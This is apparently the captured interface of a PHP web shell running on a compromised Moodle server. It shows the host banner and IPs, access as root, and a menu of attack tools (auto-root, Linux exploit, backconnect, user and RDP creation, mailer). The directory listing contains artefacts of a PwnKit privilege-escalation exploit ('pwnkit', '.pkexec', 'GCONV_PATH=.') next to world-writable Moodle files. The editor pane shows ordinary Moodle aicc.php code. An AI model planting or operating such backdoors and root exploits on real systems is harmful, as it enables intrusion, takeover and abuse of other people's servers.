Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
scorm /
datamodels /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
aicc.js
28.83
KB
-rwxrwxrwx
aicc.php
2.96
KB
-rwxrwxrwx
aicclib.php
21.77
KB
-rwxrwxrwx
debug.js.php
34.99
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
scorm_12.js
33.9
KB
-rwxrwxrwx
scorm_12.php
3.02
KB
-rwxrwxrwx
scorm_12lib.php
4.34
KB
-rwxrwxrwx
scorm_13.js
71.85
KB
-rwxrwxrwx
scorm_13.php
3.03
KB
-rwxrwxrwx
scorm_13lib.php
53.24
KB
-rwxrwxrwx
scormlib.php
53.05
KB
-rwxrwxrwx
sequencinghandler.php
2.75
KB
-rwxrwxrwx
sequencinglib.php
41.24
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aicc.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. require_once($CFG->dirroot.'/mod/scorm/locallib.php'); $userdata = new stdClass(); $def = new stdClass(); $cmiobj = new stdClass(); if (!isset($currentorg)) { $currentorg = ''; } if ($scoes = $DB->get_records('scorm_scoes', array('scorm' => $scorm->id), 'sortorder, id')) { // Drop keys so that it is a simple array. $scoes = array_values($scoes); foreach ($scoes as $sco) { $def->{($sco->id)} = new stdClass(); $userdata->{($sco->id)} = new stdClass(); $def->{($sco->id)} = get_scorm_default($userdata->{($sco->id)}, $scorm, $sco->id, $attempt, $mode); // Reconstitute objectives, comments_from_learner and comments_from_lms. $cmiobj->{($sco->id)} = ''; $currentobj = ''; $count = 0; foreach ($userdata as $element => $value) { if (substr($element, 0, 14) == 'cmi.objectives') { $element = preg_replace('/\.(\d+)\./', "_\$1.", $element); preg_match('/\_(\d+)\./', $element, $matches); if (count($matches) > 0 && $currentobj != $matches[1]) { $currentobj = $matches[1]; $count++; $end = strpos($element, $matches[1]) + strlen($matches[1]); $subelement = substr($element, 0, $end); $cmiobj->{($sco->id)} .= ' '.$subelement." = new Object();\n"; $cmiobj->{($sco->id)} .= ' '.$subelement.".score = new Object();\n"; $cmiobj->{($sco->id)} .= ' '.$subelement.".score._children = score_children;\n"; $cmiobj->{($sco->id)} .= ' '.$subelement.".score.raw = '';\n"; $cmiobj->{($sco->id)} .= ' '.$subelement.".score.min = '';\n"; $cmiobj->{($sco->id)} .= ' '.$subelement.".score.max = '';\n"; } $cmiobj->{($sco->id)} .= ' '.$element.' = \''.$value."';\n"; } } if ($count > 0) { $cmiobj->{($sco->id)} .= ' cmi.objectives._count = '.$count.";\n"; } } } $PAGE->requires->js_init_call('M.scorm_api.init', array($def, $cmiobj, $scorm->auto, $CFG->wwwroot, $scorm->id, $scoid, $attempt, $mode, $currentorg, sesskey(), $id, $scorm->autocommit));
Close